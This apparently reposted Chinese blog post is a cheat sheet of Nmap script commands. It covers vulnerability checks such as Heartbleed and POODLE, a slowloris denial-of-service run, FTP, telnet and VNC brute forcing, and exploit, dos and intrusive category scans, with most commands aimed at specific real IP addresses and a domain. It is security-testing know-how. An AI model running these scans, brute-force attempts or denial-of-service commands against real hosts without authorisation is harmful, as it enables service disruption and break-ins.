zoukankan      html  css  js  c++  java
  • Nmap扫描漏洞

    1 http 拒绝服务
    nmap –max-parallelism 800–script http-slowloris scanme.nmap.org

    2 IIS 短文件泄露

    nmap -p 8080 –script http-iis-short-name-brute 61.142.64.176

    3 ftp弱口令暴力破解

    nmap –script ftp-brute –script-args brute.emptypass=true,ftp-brute.timeout=30,userdb=/root/dirtionary/usernames.txt,brute.useraspass=true,passdb=/root/dirtionary/passwords.txt,brute.threads=3,brute.delay=6 203.195.139.153

    4 检测CVE-2011-2523中的ftp-vsftpd-backdoor

    nmap -T2 –script ftp-vsftpd-backdoor 211.139.201.240

    5 验证http中开启的-methods 方法

    nmap -T3 –script http-methods –script-args http.test-all=true,http.url-path=/www.haoshangjia.com

    6 验证HTTP.sys 远程代码执行

    nmap -sV –script http-vuln-cve2015-1635 203.195.139.153

    7验证 SSL POODLE information leak

    nmap -sV -p 443 –version-light –script ssl-poodle 218.19.141.16

    8 验证http 中开启了put 方法

    nmap –script http-put –script-args http-put.url=/uploads/testput.txt,http-put.file=/root/put.txt 218.19.141.16

    9 验证mysql 匿名访问

    nmap –script mysql-empty-password 203.195.139.153

    10 验证cve2015-1427 漏洞
    nmap –script http-vuln-cve2015-1427 –script-args command=ls 203.195.139.153

    11 验证cve2014-8877漏洞
    nmap -Pn –script http-vuln-cve2014-8877 –script-args http-vuln-cve2014-8877.cmd=dir,http-vuln-cve2014-8877.uri=/wordpress 42.96.170.128

    12 验证Cisco ASA中的CVE-2014-2126,CVE-2014-2127,CVE-2014-21,CVE-2014-2129漏洞

    nmap -p 443 –script http-vuln-cve2014-2126,http-vuln-cve2014-2127,http-vuln-cve2014-2128,http-vuln-cve2014-2129 203.195.139.153

    13验证低安全的 SSHv1,sslv2协议

    nmap –script sshv1,sslv2 www.haoshangjia.com

    14 验证CVE-2014-0224 ssl-ccs-injection
    nmap -Pn –script ssl-ccs-injection 203.195.139.153

    15 验证ssl-cert证书问题

    nmap -v -v –script ssl-cert 203.195.139.153

    16验证SSL证书的有限期

    nmap -Pn –script ssl-date www.haoshangjia.com

    17 验证CVE-2014-0160 OpenSSL Heartbleed bug

    nmap -p 443 –script ssl-heartbleed,ssl-known-key 203.195.139.153

    18 验证 Debian OpenSSL keys

    nmap -p 443 –script ssl-known-key 203.195.139.153

    18 验证弱加密SSL套件

    nmap –script ssl-enum-ciphers 203.195.139.153

    20 验证CVE 2015-4000

    nmap –script ssl-dh-params www.haoshangjia.com

    21 验证多种SSL漏洞问题

    nmap 203.195.139.153 –vv –script sshv1,ssl-ccs-injection,ssl-cert,ssl-date,ssl-dh-params,ssl-enum-ciphers,ssl-google-cert-catalog,ssl-heartbleed,ssl-known-key,sslv2

    22 在网络中检测某主机是否存在窃听他人流量

    nmap –script sniffer-detect 10.10.167.5

    23 暴力破解telnet

    nmap -p 23 –script telnet-brute –script-args userdb=myusers.lst,passdb=mypwds.lst –script-args telnet-brute.timeout=8s 203.195.139.153

    24 验证telnet是否支持加密

    nmap –script telnet-encryption 203.195.139.153

    25 精准地确认端口上运行的服务

    nmap -sV –script unusual-port 42.96.170.128

    26 收集VNC信息

    nmap –script vnc-info 203.195.139.153

    27 暴力破解VNC

    nmap –script vnc-brute –script-args brute.guesses=6,brute.emptypass=true,userdb=/root/dictionary/user.txt,brute.useraspass=true,passdb=/root/dictionary/pass.txt,brute.retries=3,brute.threads=2,brute.delay=3 42.96.170.128

    这个脚本挺长的,很多详细的参数,请参阅脚本的具体参数。
    0x03 使用系列的nmap NSE 进行检查

    nmap脚本主要分为以下几类,在扫描时可根据需要设置–script=类别这种方式进行比较笼统的扫描:
    auth: 负责处理鉴权证书(绕开鉴权)的脚本
    broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务
    brute: 提供暴力破解方式,针对常见的应用如http/snmp等
    default: 使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力
    discovery: 对网络进行更多的信息,如SMB枚举、SNMP查询等
    dos: 用于进行拒绝服务攻击
    exploit: 利用已知的漏洞入侵系统
    external: 利用第三方的数据库或资源,例如进行whois解析
    fuzzer: 模糊测试的脚本,发送异常的包到目标机,探测出潜在漏洞
    intrusive: 入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽
    malware: 探测目标机是否感染了病毒、开启了后门等信息
    safe: 此类与intrusive相反,属于安全性脚本
    version: 负责增强服务与版本扫描(Version Detection)功能的脚本
    vuln: 负责检查目标机是否有常见的漏洞(Vulnerability)

    Nmap提供的脚本命令行参数如下:
    -sC: 等价于–script=default,使用默认类别的脚本进行扫描。
    –script=: 使用某个或某类脚本进行扫描,支持通配符描述
    –script-args=

    nmap –sC 203.195.139.153
    5 使用nmap 进行信息挖掘

    nmap –script discovery 203.195.139.153

    6 使用nmap 进行拒绝服务攻击

    nmap –script dos 203.195.139.153

    7 使用nmap 利用已知的漏洞入侵系统

    nmap –script exploit 203.195.139.153

    8 使用nmap 进行利用第三方的数据库或资源进行信息收集或者攻击

    nmap –script external 203.195.139.153

    9 使用nmap 进行模糊测试,发送异常的包到目标机,探测出潜在漏洞

    nmap –script fuzzer 203.195.139.153

    10 使用nmap 进行入侵,此类脚本可能引发对方的IDS/IPS的记录或屏蔽

    nmap –script intrusive 203.195.139.153

    11 使用nmap 探测目标机是否感染了病毒、开启了后门等信息

    nmap –script malware 203.195.139.153

    12 使用nmap 对系统进行安全检查

    nmap –script safe 203.195.139.153

    13 使用nmap 对目标机进行检查是否存在常见的漏洞

    nmap –script vuln 203.195.139.153

    14 使用nmap 负责增强服务与版本扫描(Version Detection)功能的脚本

    nmap –script version 203.195.139.153

  • 相关阅读:
    STM32的串口DMA收发以及双缓冲区的实现
    平衡二叉树
    二叉树的深度
    3D数学基础(四)四元数和欧拉角
    3D数学基础(三)矩阵
    3D数学基础(二)向量
    3D数学基础(一)Unity坐标系
    快速学会开发微信小程序
    苦逼的程序员
    开通博客,在这个年末,重新开始。
  • 原文地址:https://www.cnblogs.com/linyu51/p/15634238.html
Copyright © 2011-2022 走看看